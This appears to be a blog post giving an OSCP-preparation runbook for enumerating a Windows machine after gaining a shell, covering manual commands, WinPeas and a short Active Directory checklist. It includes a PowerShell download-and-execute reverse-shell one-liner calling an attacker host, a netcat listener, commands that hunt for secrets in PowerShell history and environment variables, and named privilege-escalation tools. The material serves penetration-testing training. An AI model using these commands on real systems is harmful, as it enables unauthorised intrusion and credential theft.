avatarSecurity Guy

Summary

The website content provides a detailed runbook for OSCP certification candidates focusing on enumerating Windows machines to achieve remote code execution (RCE) and subsequent privilege escalation.

Abstract

The article outlines a structured approach to enumerating Windows machines during OSCP preparation, emphasizing the importance of thorough manual and automated enumeration. It introduces a series of runbooks that guide the reader through the process of stabilizing a shell, obtaining a backup shell, and executing specific PowerShell commands to gather essential information about the system, installed software, and running processes. The author stresses the value of manual commands to reduce errors and highlights the use of tools like WinPeas for automated enumeration. Additionally, the article provides a checklist for exploiting Active Directory (AD) when valid AD credentials are available. The author encourages the development of a personalized process for tackling boxes and shares their notes and insights on GitHub for further learning.

Opinions

  • The author believes that the key to success in OSCP is effective enumeration, particularly on Windows machines.
  • Manual enumeration is preferred initially to minimize errors and focus on one aspect at a time.
  • PowerCat is recommended for establishing stable reverse shells on Windows systems.
  • The presence of SeImpersonatePrivilege is highlighted as an easy path to root access, with tools like JuicyPotatoNG, PrintSpoofer, and GodPotato being suggested for exploitation.
  • The article suggests that non-standard directories or software versions found during manual enumeration can lead to privilege escalation.
  • Environment variables and PowerShell history are considered valuable sources of potential exploits.
  • WinPeas is endorsed for automating the enumeration process, with a specific checklist provided to identify potential exploits.
  • The author advocates for the use of Bloodhound when dealing with Active Directory environments.
  • Personalized runbooks and notes are seen as crucial tools for navigating the OSCP certification process, with the author's own resources shared for community benefit.

OSCP Prep: Introducing My Runbooks — RCE on Windows

NOTE: If you are not a member but still want to read this, CLICK HERE to read it for free!

As cliché as it sounds, getting through the OSCP is all about becoming good at enumeration. While going through the certification, I read the phrase “enumerate harder” by many former students, and I’m here to tell you it’s true. This write-up is the third in my series explaining my runbooks for enumerating machines at an OSCP level. You can find the runbooks for initial enumeration and Linux enumeration here:

This write-up focuses on how to enumerate a Windows machine once you have a shell on the machine. As such, you can follow this runbook once you have reached that point on a Windows box when training for the OSCP or doing a CTF at a similar level. To get a better understanding of how to get remote code execution (RCE) have a look at my initial enumeration runbook linked above.

One of the most used enumeration tools: WinPeas

Manual Enumeration Runbook

If you have read my Linux runbook, you will notice similarities in how I approach the enumerations. This is very much on purpose. Everything isn’t directly comparable between Linux and Windows, but some things are. As such, I have designed runbooks that follow the same key principles in the same order. One of those principles is the idea of manually enumerating first and then enumerating with automated tools.

While you can get 95% of the way using automated tools to enumerate the machines for you, I prefer to begin the enumeration process of the machines by firing off a few manual commands. Doing it this way reduces my margin of error greatly, as it forces me to look at one thing at a time rather than crawling through an entire WinPeas output in an attempt to find the needle in the haystack that will give me root. The philosophy here is “go slow to go fast”. WinPeas is nice, but sometimes there are quick wins in doing a few simple commands before running your automated tooling.

Shell Stabilization And Getting a Backup Shell

On Windows, I have rarely experienced shell instabilities. So we don’t need to do much here. This is very preferential, but I usually use this PowerCat script for reverse shells on Windows. You execute it by running this through whatever RCE exploit you have found:

IEX(New-Object System.Net.WebClient).DownloadString('http://${ATTACKER_IP}:${ATTACKER_HTTP_PORT}/powercat.ps1'); powercat -c ${ATTACKER_IP} -p ${ATTACKER_PORT} -e powershell

And that generally results in a stable shell. Once I have one stable shell, my next step is to get a backup shell running. Sometimes, even “stable” shells break or get interrupted which can snap me out of where I was about to go next. However, doing the RCE exploit twice is almost as fast as doing it once. So getting a backup shell up and running immediately allows me to focus completely on enumerating the machine and forgetting about the steps before the RCE. Once I’m “in”, I want to stay “in”.

Note! This took me way too long to figure out, so here it goes for the rest of you!

When you catch a reverse shell on your Kali Linux machine, e.g. on port 443 with:

nc -nvlp 443

Once the TCP handshake is complete and the connection is established, port 443 is free to be used for the next reverse shell! I see some seasoned CTF players on Youtube etc. choose new ports for their next reverse shells, which is not necessary. Once you find a port that works, keep using it. The added complexity of constantly using new ports just increases the odds of copy/paste errors leading to exploits that don’t work.

a small tangent, but important to note.

Finding Myself

For everything that follows, you can assume I am running it in a PowerShell, not a cmd shell.

The first commands I run are usually some combination of:

whoami
whoami /priv
net user
net user /domain
systeminfo
ipconfig

This gives me a basic understanding of “where I am” and what kind of box this is. Remember that both the username and the hostname might be clues to where to look. A lot of boxes will have meaningful names. Can you use that as a clue somehow?

Two of these commands are worth paying extra attention to. the whoami /priv will give you the privileges of the user we are running as. As demonstrated in my hacking 101 write-up, if you see SeImpersonatePrivilegein the output, you have an easy way to root through the JuicyPotatoNG, PrintSpoofer or GodPotato tools (I prefer them in that order, by the way). Make sure you know how to abuse this privilege as it shows up on a fair number of practice machines so you can assume it can also occur at the exam. If you are good at this it might mean some easy points in the OSCP and similar CTFs. You can see my notes on this here.

Additionally, the net user /domain will tell you whether the current user is a domain user. If so, this might open AD-specific attack vectors (AD section is at the bottom).

Looking into Directories

Anything interesting in the root of C:/?

ls C:/

Is there anything interesting in the current users’ home folder? Other user’s folders (that we may have access to) or simply located in C:/Program Files ?

ls C:/Users/user/
ls C:/Users/user/Desktop
ls C:/Users/user/Documents
ls "C:/Program Files (x86)"
ls "C:/Program Files"

The intention here is to discover anything out of the ordinary. If you see any non-standard folders in the root of C:/ or similar locations, look into what it is. If it sounds like the name of a piece of software, google it, searchsploit it and check if you can figure out what version might be located on the machine. Often simple manual enumeration like this can lead to root.

Installed Software & Running Processes

32-bit:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64-bit:

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Running Processes:

Get-Process

If you find anything out of the ordinary, look into what it is and whether there are exploits for it. Similarly to the directory search above, make sure to google and searchsploit anything that looks interesting.

Keys hiding in plain sight?

Check the history of all users. This is usually located at:

more C:\Users\${user}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Check Environment variables for API keys and similar goodies:

Get-ChildItem -Path Env:

The history is a classic place for the Windows boxes to have hints or direct escalations routes for you to abuse. If you see a user has run a script, check what is in the script. Follow up on anything you find here.

Automated tooling — WinPeas

The purpose of WinPeas is to automate all the above manual enumeration commands and more. It will give you information about interesting tasks, services, folders you can write to, CVEs and kernel exploits potentially relevant to the machine and so much more. Diving into each section in WinPeas could be an entire write-up in itself (or a series of write-ups, for that matter). The TL;DR here is to check each section carefully. However, for Windows, I made an explicit checklist for myself:

  • What servers are running on the machine. Can you gain access to an internal HTTP/MySQL/MSSQL server or something like that?
  • Is there a Task or Service running on the machine that you can abuse?
  • If a non-default service is present that looks promising, but you don’t have write-permissions to the .exe, check if it is missing a DLL with Procmon.
  • Is the machine set up with AlwaysInstallElevated ?
  • Anything else that WinPeas highlights as an escalation factor?

AD Checklist — Run this if you have valid AD creds

As with WinPeas, many things can be said about what to do if you have valid AD credentials, but here is my quick checklist:

  • Any users kerberoastable?
  • Any users ASREP-roastable?
  • Run bloodhound and visualize the AD. Anything comes to mind?

Final Remarks

As mentioned in previous write-ups, your process will be different from everybody else’s. However, I believe finding your groove with tackling boxes is what will get you through the OSCP, and a runbook is one tool to do that. I have found that having something I could always go back to after a deep rabbit hole helped me a lot during my practice. However, it’s not a magic formula. No list of actions will get you from zero to hero overnight. What gets you there is the hard work you put in!

If you want to dive into my notes unorganized notes from the OSCP and other red-teaming exercises, feel free to have a look at my Github Repository with my notes here.

Also, I’m not super active on socials but feel free to give me a follow on X (or is it Twitter?)

Cybersecurity
Education
Technology
Security
Hacking
Recommended from ReadMedium
avatarJose Campo
Level Up Your OSCP+ Prep: Key Active Directory Pentesting Skills from HTB Academy

3 min read
avatarSecurity Guy
OSCP: From Remote Code Execution to Interactive Shell

How do you go from Remote Code Execution to an Interactive Shell? Look no further. The answer is here!

6 min read
avatarAli Dak
Passing OSCP: A Strategic Certification or Just a Popular Badge?

In this article, I will try to explain why and how I took the OSCP, share my experiences, and provide some key insights. You will find the…

4 min read
avatarVery Lazy Tech 👾
Penetration Testing WiFi Networks: A Comprehensive Guide

In the modern age, wireless networks (WiFi) have become ubiquitous, facilitating seamless internet connectivity across devices. However…

5 min read
avatarAbhirupKonwar
How I got access to Credentials easily

Elite Google Dorking🥷

4 min read
avatarRootRouteway
Hacking Active Directory: From Reconnaissance to Exploitation -Part 1

Designed by Freepik

9 min read